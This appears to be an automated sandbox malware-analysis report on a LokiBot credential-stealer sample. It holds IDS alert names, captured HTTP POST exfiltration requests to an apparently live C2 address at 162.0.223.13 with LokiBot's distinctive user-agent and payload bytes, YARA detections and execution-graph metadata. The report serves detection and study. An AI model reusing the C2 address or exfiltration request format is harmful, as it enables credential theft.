Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/23/22-07:58:29.454711 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49699 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:37.371596 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49701 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:37.371596 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49701 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:29.454711 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49699 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:29.454711 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49699 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:37.371596 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49701 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:35.112918 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49700 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:35.112918 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49700 | 80 | 192.168.2.5 | 162.0.223.13
09/23/22-07:58:35.112918 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49700 | 80 | 192.168.2.5 | 162.0.223.13
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 23, 2022 07:58:29.179511070 CEST | 49699 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:29.359904051 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:29.360583067 CEST | 49699 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:29.454710960 CEST | 49699 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:29.634676933 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:29.635971069 CEST | 49699 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:29.816203117 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:30.407465935 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:30.407499075 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:30.407515049 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:30.407531977 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:30.407542944 CEST | 80 | 49699 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:30.407654047 CEST | 49699 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:30.407746077 CEST | 49699 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:30.413930893 CEST | 49699 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:34.932647943 CEST | 49700 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:35.109270096 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:35.109378099 CEST | 49700 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:35.112917900 CEST | 49700 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:35.289486885 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:35.289758921 CEST | 49700 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:35.466195107 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:36.030708075 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:36.030744076 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:36.030761003 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:36.030777931 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:36.030790091 CEST | 80 | 49700 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:36.030867100 CEST | 49700 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:36.030981064 CEST | 49700 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:37.182208061 CEST | 49701 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:37.359723091 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:37.363136053 CEST | 49701 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:37.371596098 CEST | 49701 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:37.549609900 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:37.549799919 CEST | 49701 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:37.726494074 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:38.275764942 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:38.275799990 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:38.275816917 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:38.275834084 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:38.275845051 CEST | 80 | 49701 | 162.0.223.13 | 192.168.2.5
Sep 23, 2022 07:58:38.275921106 CEST | 49701 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:38.276007891 CEST | 49701 | 80 | 192.168.2.5 | 162.0.223.13
Sep 23, 2022 07:58:38.276607037 CEST | 49701 | 80 | 192.168.2.5 | 162.0.223.13
• 162.0.223.13
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49699 | 162.0.223.13 | 80 | C:\Users\user\Desktop\PI#53034601506400.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 07:58:29.454710960 CEST | 93 | OUT | POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 162.0.223.13
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 9AC780C0
    Content-Length: 192
    Connection: close
Sep 23, 2022 07:58:29.635971069 CEST | 94 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: 'ckav.rualfons965543DESKTOP-716T771k08F9C4E9C79A3B52B3F739430KDKvl
Sep 23, 2022 07:58:30.407465935 CEST | 95 | IN | HTTP/1.1 200 OK
    Date: Fri, 23 Sep 2022 05:58:29 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
    X-Powered-By: PHP/5.4.16
    Content-Length: 5017
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
Sep 23, 2022 07:58:30.407499075 CEST | 96 | IN | Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
Sep 23, 2022 07:58:30.407515049 CEST | 98 | IN | Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
Sep 23, 2022 07:58:30.407531977 CEST | 99 | IN | Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49700 | 162.0.223.13 | 80 | C:\Users\user\Desktop\PI#53034601506400.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 07:58:35.112917900 CEST | 100 | OUT | POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 162.0.223.13
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 9AC780C0
    Content-Length: 192
    Connection: close
Sep 23, 2022 07:58:35.289758921 CEST | 100 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: 'ckav.rualfons965543DESKTOP-716T771+08F9C4E9C79A3B52B3F739430bRUEv
Sep 23, 2022 07:58:36.030708075 CEST | 102 | IN | HTTP/1.1 200 OK
    Date: Fri, 23 Sep 2022 05:58:35 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
    X-Powered-By: PHP/5.4.16
    Content-Length: 5017
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
Sep 23, 2022 07:58:36.030744076 CEST | 103 | IN | Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
Sep 23, 2022 07:58:36.030761003 CEST | 104 | IN | Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
Sep 23, 2022 07:58:36.030777931 CEST | 106 | IN | Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49701 | 162.0.223.13 | 80 | C:\Users\user\Desktop\PI#53034601506400.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 07:58:37.371596098 CEST | 106 | OUT | POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 162.0.223.13
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 9AC780C0
    Content-Length: 165
    Connection: close
Sep 23, 2022 07:58:37.549799919 CEST | 107 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
    Data Ascii: (ckav.rualfons965543DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Sep 23, 2022 07:58:38.275764942 CEST | 108 | IN | HTTP/1.1 200 OK
    Date: Fri, 23 Sep 2022 05:58:37 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
    X-Powered-By: PHP/5.4.16
    Content-Length: 5017
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers */ background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); /* W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,
Sep 23, 2022 07:58:38.275799990 CEST | 109 | IN | Data Ascii: 0px 4px 10px rgba(0,0,0,0.15), 0px 5px 2px rgba(0,0,0,0.1), 0px 6px 30px rgba(0,0,0,0.1);}.jumbotron p { font-size: 28px; font-weight: 100;}.main { background: white; color: #234;
Sep 23, 2022 07:58:38.275816917 CEST | 111 | IN | Data Ascii: me "webmaster" and directed to the website's domain should reach the appropriate person.</p> <p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p> </di
Sep 23, 2022 07:58:38.275834084 CEST | 112 | IN | Data Ascii: are that makes the website run.</p> <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. Unless you intended to visit CentOS.org, the CentOS Proj


Target ID: 0
Start time: 07:58:27
Start date: 23/09/2022
Path: C:\Users\user\Desktop\PI#53034601506400.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PI#53034601506400.exe"
Imagebase: 0xa0000
File size: 864768 bytes
MD5 hash: 05D1649E1B980B3D59B189A2FE07FC3C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Target ID:1
                                                Start time:07:58:37
                                                Start date:23/09/2022
                                                Path:C:\Users\user\Desktop\PI#53034601506400.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\PI#53034601506400.exe
                                                Imagebase:0x820000
                                                File size:864768 bytes
                                                MD5 hash:05D1649E1B980B3D59B189A2FE07FC3C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.322806512.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low


                                                  Execution Graph

                                                  Execution Coverage:12.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:54
                                                  Total number of Limit Nodes:1
                                                  execution_graph 11113 7771f0 11114 777204 11113->11114 11117 77742a 11114->11117 11124 777510 11117->11124 11128 777626 11117->11128 11132 777688 11117->11132 11136 77760c 11117->11136 11140 777500 11117->11140 11125 777554 11124->11125 11126 77764b 11125->11126 11144 777907 11125->11144 11129 777639 11128->11129 11130 77764b 11128->11130 11131 777907 2 API calls 11129->11131 11131->11130 11133 77768e 11132->11133 11157 777bd0 11133->11157 11134 77720d 11137 7775bf 11136->11137 11138 77764b 11137->11138 11139 777907 2 API calls 11137->11139 11139->11138 11141 777554 11140->11141 11142 77764b 11141->11142 11143 777907 2 API calls 11141->11143 11143->11142 11145 777926 11144->11145 11149 777957 11145->11149 11153 777968 11145->11153 11146 777936 11146->11126 11150 7779a2 11149->11150 11151 7779cc RtlEncodePointer 11150->11151 11152 7779f5 11150->11152 11151->11152 11152->11146 11154 7779a2 11153->11154 11155 7779cc RtlEncodePointer 11154->11155 11156 7779f5 11154->11156 11155->11156 11156->11146 11158 777bde 11157->11158 11161 777c09 11158->11161 11159 777bee 11159->11134 11162 777c51 11161->11162 11163 777c77 RtlEncodePointer 11162->11163 11164 777ca0 11162->11164 11163->11164 11164->11159 11165 7740d0 11166 7740e2 11165->11166 11167 7740ee 11166->11167 11169 7741e0 11166->11169 11170 774205 11169->11170 11174 7742e0 11170->11174 11178 7742d0 11170->11178 11175 774307 11174->11175 11176 7743e4 11175->11176 11182 7738a8 11175->11182 11180 774307 11178->11180 11179 7743e4 11180->11179 11181 7738a8 CreateActCtxA 11180->11181 11181->11179 11183 775370 CreateActCtxA 11182->11183 11185 775433 11183->11185
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: 277a37c26ee0bfd354f2f8f1096a2558ccbfb09cdb299de7e4cb7376c4ba8609
                                                  • Instruction ID: 2e325ecf81858370264c7f2bd818c4ab0a71a932228aaaee508102c139ed2b77
                                                  • Opcode Fuzzy Hash: 277a37c26ee0bfd354f2f8f1096a2558ccbfb09cdb299de7e4cb7376c4ba8609
                                                  • Instruction Fuzzy Hash: D8D25D74B40219CFDB28DF64D858AA977B2BF89344F10C8A9D9099B355DB34EC86CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1312ee8fc8e44c5f59742859bc82d7f8760d0afa654fdfc7e5491296560ddfe1
                                                  • Instruction ID: 39ade13386c8299ef6fc1e7cc3f17743e50043c22dda8e349ae0377038910514
                                                  • Opcode Fuzzy Hash: 1312ee8fc8e44c5f59742859bc82d7f8760d0afa654fdfc7e5491296560ddfe1
                                                  • Instruction Fuzzy Hash: AD120235F006558BCF289B74C4546BE77A2AF88384F14C4AAE80E9B391DB3CDD41DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 936 775364-775431 CreateActCtxA 938 775433-775439 936->938 939 77543a-775494 936->939 938->939 946 775496-775499 939->946 947 7754a3-7754a7 939->947 946->947 948 7754a9-7754b5 947->948 949 7754b8 947->949 948->949 951 7754b9 949->951 951->951
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00775421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 1d3b705ad5e6d43fafdfbeaae2ffcccd2c14237875a00610ac9c3f95ae6d41ed
                                                  • Instruction ID: 6574bceb4cff0f73cba616b50aa61eb6ae18bc9c2ac9cd7e46b7ea8c17c31e0b
                                                  • Opcode Fuzzy Hash: 1d3b705ad5e6d43fafdfbeaae2ffcccd2c14237875a00610ac9c3f95ae6d41ed
                                                  • Instruction Fuzzy Hash: FC4116B1D0065CCEDB24CFA9C8887DDBBB5BF59304F20806AD409AB351DB79598ACF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 952 7738a8-775431 CreateActCtxA 955 775433-775439 952->955 956 77543a-775494 952->956 955->956 963 775496-775499 956->963 964 7754a3-7754a7 956->964 963->964 965 7754a9-7754b5 964->965 966 7754b8 964->966 965->966 968 7754b9 966->968 968->968
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00775421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6147b455ecfe2d61d64c1126a0436282c500d31a0ffa7128f7fbae5c9946789a
                                                  • Instruction ID: 66a2933f56b5e9b874d0ba1981711f1d4b4536997c25ed7d2b696d8af1dc7d21
                                                  • Opcode Fuzzy Hash: 6147b455ecfe2d61d64c1126a0436282c500d31a0ffa7128f7fbae5c9946789a
                                                  • Instruction Fuzzy Hash: 5A41E5B1D0061CCBDB24DFA9C8887DDBBB5BF59305F208069D409AB351DBB5698ACF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 969 777c09-777c58 call 777a40 call 777a98 974 777c5e 969->974 975 777c5a-777c5c 969->975 976 777c63-777c6b 974->976 975->976 977 777cc7-777cd9 976->977 978 777c6d-777c9e RtlEncodePointer 976->978 980 777ca7-777cbd 978->980 981 777ca0-777ca6 978->981 980->977 981->980
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00777C8D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: bde5c48a0921d5063fda1feabaf76282c70e6f090f2dcdbb4fdb2602c1a1e0d6
                                                  • Instruction ID: c2a90f9abb569f3b2ed012dc48b34a9f1f262a649354c6e046710cdeb42a05b7
                                                  • Opcode Fuzzy Hash: bde5c48a0921d5063fda1feabaf76282c70e6f090f2dcdbb4fdb2602c1a1e0d6
                                                  • Instruction Fuzzy Hash: AE21BB748043898FCB15CFA8D1497DABFF8FB09314F118869D449A7602C7799949CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 983 777957-7779aa 986 7779b0 983->986 987 7779ac-7779ae 983->987 988 7779b5-7779c0 986->988 987->988 989 7779c2-7779f3 RtlEncodePointer 988->989 990 777a21-777a2e 988->990 992 7779f5-7779fb 989->992 993 7779fc-777a1c 989->993 992->993 993->990
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 007779E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
